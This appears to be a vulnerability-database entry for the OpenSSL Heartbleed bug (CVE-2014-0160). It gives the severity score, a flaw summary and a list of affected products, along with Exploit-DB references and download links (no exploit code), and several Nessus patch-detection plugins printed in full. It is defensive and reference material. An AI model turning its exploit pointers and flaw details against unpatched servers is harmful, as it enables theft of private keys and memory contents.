Vulnerabilities > CVE-2014-0160 - Out-of-bounds Read vulnerability in multiple products

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
NONE
Availability impact
NONE

Summary

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

Vulnerable Configurations

Part Description Count
Application
Openssl
11
Application
Filezilla-Project
21
Application
Siemens
2
Application
Mitel
11
Application
Redhat
3
OS
Siemens
4
OS
Intellian
5
OS
Opensuse
2
OS
Canonical
3
OS
Fedoraproject
2
OS
Redhat
6
OS
Debian
3
OS
Ricon
1
Hardware
Siemens
4
Hardware
Intellian
2
Hardware
Ricon
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Overread Buffers
    An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.

Exploit-Db

  • descriptionOpenSSL TLS Heartbeat Extension - Memory Disclosure. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    fileexploits/multiple/remote/32745.py
    idEDB-ID:32745
    last seen2016-02-03
    modified2014-04-08
    platformmultiple
    port443
    published2014-04-08
    reporterJared Stafford
    sourcehttps://www.exploit-db.com/download/32745/
    titleOpenSSL TLS Heartbeat Extension - Memory Disclosure
    typeremote
  • descriptionOpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    fileexploits/multiple/remote/32764.py
    idEDB-ID:32764
    last seen2016-02-03
    modified2014-04-09
    platformmultiple
    port443
    published2014-04-09
    reporterFitzl Csaba
    sourcehttps://www.exploit-db.com/download/32764/
    titleOpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure Multiple SSL/TLS versions
    typeremote
  • descriptionHeartbleed OpenSSL - Information Leak Exploit (1). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    idEDB-ID:32791
    last seen2016-02-03
    modified2014-04-10
    published2014-04-10
    reporterprdelka
    sourcehttps://www.exploit-db.com/download/32791/
    titleHeartbleed OpenSSL - Information Leak Exploit 1
  • descriptionHeartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    idEDB-ID:32998
    last seen2016-02-03
    modified2014-04-24
    published2014-04-24
    reporterAyman Sagy
    sourcehttps://www.exploit-db.com/download/32998/
    titleHeartbleed OpenSSL - Information Leak Exploit 2 - DTLS Support

Metasploit

Nessus

  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0416.NASL
    descriptionUpdated rhevm-spice-client packages that fix multiple security issues are now available for Red Hat Enterprise Virtualization Manager 3. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems. The rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE client. OpenSSL, a general purpose cryptography library with a TLS implementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer package has been updated to correct the following issues : An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169) A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353) It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text. (CVE-2012-4929) Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the original reporter. The updated mingw-virt-viewer Windows SPICE client further includes OpenSSL security fixes that have no security impact on mingw-virt-viewer itself. The security fixes included in this update address the following CVE numbers : CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166 All Red Hat Enterprise Virtualization Manager users are advised to upgrade to these updated packages, which address these issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id79013
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/79013
    titleRHEL 6 : rhevm-spice-client (RHSA-2014:0416)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2014:0416. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(79013);
      script_version("1.9");
      script_cvs_date("Date: 2019/10/24 15:35:38");
    
      script_cve_id("CVE-2012-2686", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160");
      script_bugtraq_id(55704, 57755, 57778, 60268, 64530, 64618, 64691, 66690);
      script_xref(name:"RHSA", value:"2014:0416");
    
      script_name(english:"RHEL 6 : rhevm-spice-client (RHSA-2014:0416)");
      script_summary(english:"Checks the rpm output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated rhevm-spice-client packages that fix multiple security issues
    are now available for Red Hat Enterprise Virtualization Manager 3.
    
    The Red Hat Security Response Team has rated this update as having
    Important security impact. Common Vulnerability Scoring System (CVSS)
    base scores, which give detailed severity ratings, are available for
    each vulnerability from the CVE links in the References section.
    
    Red Hat Enterprise Virtualization Manager provides access to virtual
    machines using SPICE. These SPICE client packages provide the SPICE
    client and usbclerk service for both Windows 32-bit operating systems
    and Windows 64-bit operating systems.
    
    The rhevm-spice-client package includes the mingw-virt-viewer Windows
    SPICE client. OpenSSL, a general purpose cryptography library with a
    TLS implementation, is bundled with mingw-virt-viewer. The
    mingw-virt-viewer package has been updated to correct the following
    issues :
    
    An information disclosure flaw was found in the way OpenSSL handled
    TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS
    client or server could send a specially crafted TLS or DTLS Heartbeat
    packet to disclose a limited portion of memory per request from a
    connected client or server. Note that the disclosed portions of memory
    could potentially include sensitive information such as private keys.
    (CVE-2014-0160)
    
    It was discovered that OpenSSL leaked timing information when
    decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode
    cipher suites were used. A remote attacker could possibly use this
    flaw to retrieve plain text from the encrypted packets by using a
    TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169)
    
    A NULL pointer dereference flaw was found in the way OpenSSL handled
    TLS/SSL protocol handshake packets. A specially crafted handshake
    packet could cause a TLS/SSL client using OpenSSL to crash.
    (CVE-2013-4353)
    
    It was discovered that the TLS/SSL protocol could leak information
    about plain text when optional compression was used. An attacker able
    to control part of the plain text sent over an encrypted TLS/SSL
    connection could possibly use this flaw to recover other portions of
    the plain text. (CVE-2012-4929)
    
    Red Hat would like to thank the OpenSSL project for reporting
    CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as
    the original reporter.
    
    The updated mingw-virt-viewer Windows SPICE client further includes
    OpenSSL security fixes that have no security impact on
    mingw-virt-viewer itself. The security fixes included in this update
    address the following CVE numbers :
    
    CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166
    
    All Red Hat Enterprise Virtualization Manager users are advised to
    upgrade to these updated packages, which address these issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://rhn.redhat.com/errata/RHSA-2014-0416.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2013-0169.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2012-4929.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2013-4353.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2014-0160.html"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
    script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-cab");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-msi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-cab");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-msi");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/09/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/08");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! ereg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    flag = 0;
    if (rpm_exists(rpm:"rhevm-spice-client-x64-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-cab-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x64-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-msi-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x86-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-cab-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x86-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-msi-3.3-12.el6_5")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rhevm-spice-client-x64-cab-3.3 / rhevm-spice-client-x64-msi-3.3 / etc");
    }
    
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2014-0032.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - fix CVE-2014-3567 - memory leak when handling session tickets - fix CVE-2014-3513 - memory leak in srtp support - add support for fallback SCSV to partially mitigate (CVE-2014-3566) (padding attack on SSL3) - add ECC TLS extensions to DTLS (#1119800) - fix CVE-2014-3505 - doublefree in DTLS packet processing - fix CVE-2014-3506 - avoid memory exhaustion in DTLS - fix CVE-2014-3507 - avoid memory leak in DTLS - fix CVE-2014-3508 - fix OID handling to avoid information leak - fix CVE-2014-3509 - fix race condition when parsing server hello - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS - fix CVE-2014-3511 - disallow protocol downgrade via fragmentation - fix CVE-2014-0224 fix that broke EAP-FAST session resumption support - drop EXPORT, RC2, and DES from the default cipher list (#1057520) - print ephemeral key size negotiated in TLS handshake (#1057715) - do not include ECC ciphersuites in SSLv2 client hello (#1090952) - properly detect encryption failure in BIO (#1100819) - fail on hmac integrity check if the .hmac file is empty (#1105567) - FIPS mode: make the limitations on DSA, DH, and RSA keygen length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment variable is set - fix CVE-2010-5298 - possible use of memory after free - fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment - fix CVE-2014-0198 - possible NULL pointer dereference - fix CVE-2014-0221 - DoS from invalid DTLS handshake packet - fix CVE-2014-0224 - SSL/TLS MITM vulnerability - fix CVE-2014-3470 - client-side DoS when using anonymous ECDH - add back support for secp521r1 EC curve - fix CVE-2014-0160 - information disclosure in TLS heartbeat extension - use 2048 bit RSA key in FIPS selftests - add DH_compute_key_padded needed for FIPS CAVS testing - make 3des strength to be 128 bits instead of 168 (#1056616) - FIPS mode: do not generate DSA keys and DH parameters < 2048 bits - FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys) - FIPS mode: add DH selftest - FIPS mode: reseed DRBG properly on RAND_add - FIPS mode: add RSA encrypt/decrypt selftest - FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key - use the key length from configuration file if req -newkey rsa is invoked - fix CVE-2013-4353 - Invalid TLS handshake crash - fix CVE-2013-6450 - possible MiTM attack on DTLS1 - fix CVE-2013-6449 - crash when version in SSL structure is incorrect - add back some no-op symbols that were inadvertently dropped
    last seen2020-06-01
    modified2020-06-02
    plugin id79547
    published2014-11-26
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79547
    titleOracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The package checks in this plugin were extracted from OracleVM
    # Security Advisory OVMSA-2014-0032.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(79547);
      script_version("1.21");
      script_cvs_date("Date: 2019/11/12");
    
      script_cve_id("CVE-2010-5298", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3505", "CVE-2014-3506", "CVE-2014-3507", "CVE-2014-3508", "CVE-2014-3509", "CVE-2014-3510", "CVE-2014-3511", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567");
      script_bugtraq_id(64530, 64618, 64691, 66690, 66801, 67193, 67898, 67899, 67900, 67901, 69075, 69076, 69078, 69079, 69081, 69082, 69084, 70574, 70584, 70586);
    
      script_name(english:"OracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE)");
      script_summary(english:"Checks the RPM output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote OracleVM host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote OracleVM system is missing necessary patches to address
    critical security updates :
    
      - fix CVE-2014-3567 - memory leak when handling session
        tickets
    
      - fix CVE-2014-3513 - memory leak in srtp support
    
      - add support for fallback SCSV to partially mitigate
        (CVE-2014-3566) (padding attack on SSL3)
    
      - add ECC TLS extensions to DTLS (#1119800)
    
      - fix CVE-2014-3505 - doublefree in DTLS packet processing
    
      - fix CVE-2014-3506 - avoid memory exhaustion in DTLS
    
      - fix CVE-2014-3507 - avoid memory leak in DTLS
    
      - fix CVE-2014-3508 - fix OID handling to avoid
        information leak
    
      - fix CVE-2014-3509 - fix race condition when parsing
        server hello
    
      - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling
        in DTLS
    
      - fix CVE-2014-3511 - disallow protocol downgrade via
        fragmentation
    
      - fix CVE-2014-0224 fix that broke EAP-FAST session
        resumption support
    
      - drop EXPORT, RC2, and DES from the default cipher list
        (#1057520)
    
      - print ephemeral key size negotiated in TLS handshake
        (#1057715)
    
      - do not include ECC ciphersuites in SSLv2 client hello
        (#1090952)
    
      - properly detect encryption failure in BIO (#1100819)
    
      - fail on hmac integrity check if the .hmac file is empty
        (#1105567)
    
      - FIPS mode: make the limitations on DSA, DH, and RSA
        keygen length enforced only if
        OPENSSL_ENFORCE_MODULUS_BITS environment variable is set
    
      - fix CVE-2010-5298 - possible use of memory after free
    
      - fix CVE-2014-0195 - buffer overflow via invalid DTLS
        fragment
    
      - fix CVE-2014-0198 - possible NULL pointer dereference
    
      - fix CVE-2014-0221 - DoS from invalid DTLS handshake
        packet
    
      - fix CVE-2014-0224 - SSL/TLS MITM vulnerability
    
      - fix CVE-2014-3470 - client-side DoS when using anonymous
        ECDH
    
      - add back support for secp521r1 EC curve
    
      - fix CVE-2014-0160 - information disclosure in TLS
        heartbeat extension
    
      - use 2048 bit RSA key in FIPS selftests
    
      - add DH_compute_key_padded needed for FIPS CAVS testing
    
      - make 3des strength to be 128 bits instead of 168
        (#1056616)
    
      - FIPS mode: do not generate DSA keys and DH parameters <
        2048 bits
    
      - FIPS mode: use approved RSA keygen (allows only 2048 and
        3072 bit keys)
    
      - FIPS mode: add DH selftest
    
      - FIPS mode: reseed DRBG properly on RAND_add
    
      - FIPS mode: add RSA encrypt/decrypt selftest
    
      - FIPS mode: add hard limit for 2^32 GCM block encryptions
        with the same key
    
      - use the key length from configuration file if req
        -newkey rsa is invoked
    
      - fix CVE-2013-4353 - Invalid TLS handshake crash
    
      - fix CVE-2013-6450 - possible MiTM attack on DTLS1
    
      - fix CVE-2013-6449 - crash when version in SSL structure
        is incorrect
    
      - add back some no-op symbols that were inadvertently
        dropped"
      );
      # https://oss.oracle.com/pipermail/oraclevm-errata/2014-November/000240.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?e1e2973b"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected openssl package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssl");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/12/23");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/11/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/26");
      script_set_attribute(attribute:"in_the_news", value:"true");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"OracleVM Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/OracleVM/release");
    if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM");
    if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release);
    if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
    if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);
    
    flag = 0;
    if (rpm_check(release:"OVS3.3", reference:"openssl-1.0.1e-30.el6_6.2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssl");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idHP_VCA_SSRT101531-SLES.NASL
    descriptionThe RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77023
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/77023
    titleHP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(77023);
      script_version("1.10");
      script_cvs_date("Date: 2018/07/12 19:01:16");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
      script_xref(name:"HP", value:"emr_na-c04262472");
      script_xref(name:"HP", value:"HPSBMU03020");
      script_xref(name:"HP", value:"SSRT101531");
    
      script_name(english:"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks the version of the VCA package.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host contains software that is affected by an information
    disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The RPM installation of HP Version Control Agent (VCA) on the remote
    Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,
    affected by an information disclosure vulnerability.
    
    An out-of-bounds read error, known as the 'Heartbleed Bug', exists
    related to handling TLS heartbeat extensions that could allow an
    attacker to obtain sensitive information such as primary key material,
    secondary key material, and other protected content.");
      script_set_attribute(attribute:"solution", value:"Upgrade to VCA 7.3.2 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9ffb6dc");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/24");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/06");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:version_control_agent");
      script_set_attribute(attribute:"in_the_news", value:"true");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"SuSE Local Security Checks");
    
      script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release !~ "^SLES") audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server");
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    # These are the only versions the software is supported
    # however you can install it on later versions. So
    # only check non-supported versions if paranoia is on.
    if (
      report_paranoia < 2 &&
      !ereg(pattern:"SLES(8|9|10|11)($|[^0-9])", string:release)
    ) audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server 8 / 9 / 10 / 11");
    
    rpms = get_kb_item_or_exit("Host/SuSE/rpm-list");
    if ("hpvca-" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, "HP Version Control Agent");
    
    # Get the RPM version
    match = eregmatch(string:rpms, pattern:"(^|\n)hpvca-(\d+\.\d+\.\d+-\d+)");
    if (isnull(match)) audit(AUDIT_VER_FAIL, "HP Version Control Agent");
    
    version = match[2];
    version = ereg_replace(string:version, replace:".", pattern:"-");
    
    fix = "7.3.2.0";
    
    # These specific version lines are affected
    if (
      version =~ "^7\.2\.2\." ||
      version =~ "^7\.3\.[0-1]\."
    )
    {
      if (report_verbosity > 0)
      {
        report =
         '\n  Installed version : ' + version +
         '\n  Fixed version     : ' + fix +
         '\n';
        security_hole(port:0, extra:report);
      }
      else security_hole(0);
    }
    else audit(AUDIT_PACKAGE_NOT_AFFECTED, "HP Version Control Agent");
    
  • NASL familyWindows
    NASL idWEBSENSE_EMAIL_SECURITY_HEARTBLEED.NASL
    descriptionThe version of Websense Email Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73758
    published2014-04-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73758
    titleWebsense Email Security Heartbeat Information Disclosure (Heartbleed)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73758);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/26");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
    
      script_name(english:"Websense Email Security Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks version of OpenSSL DLL file.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host has an email security application installed that is
    affected by an information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of Websense Email Security installed on the remote Windows
    host contains a bundled version of an OpenSSL DLL file. It is,
    therefore, affected by an information disclosure vulnerability.
    
    An out-of-bounds read error, known as the 'Heartbleed Bug', exists
    related to handling TLS heartbeat extensions that could allow an
    attacker to obtain sensitive information such as primary key material,
    secondary key material, and other protected content.");
      # http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdf
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?60cf5c8e");
      # http://www.websense.com/support/article/kbarticle/Hotfix-OpenSSL-for-Websense-Email-Security-7-3-with-HF-6-and-later
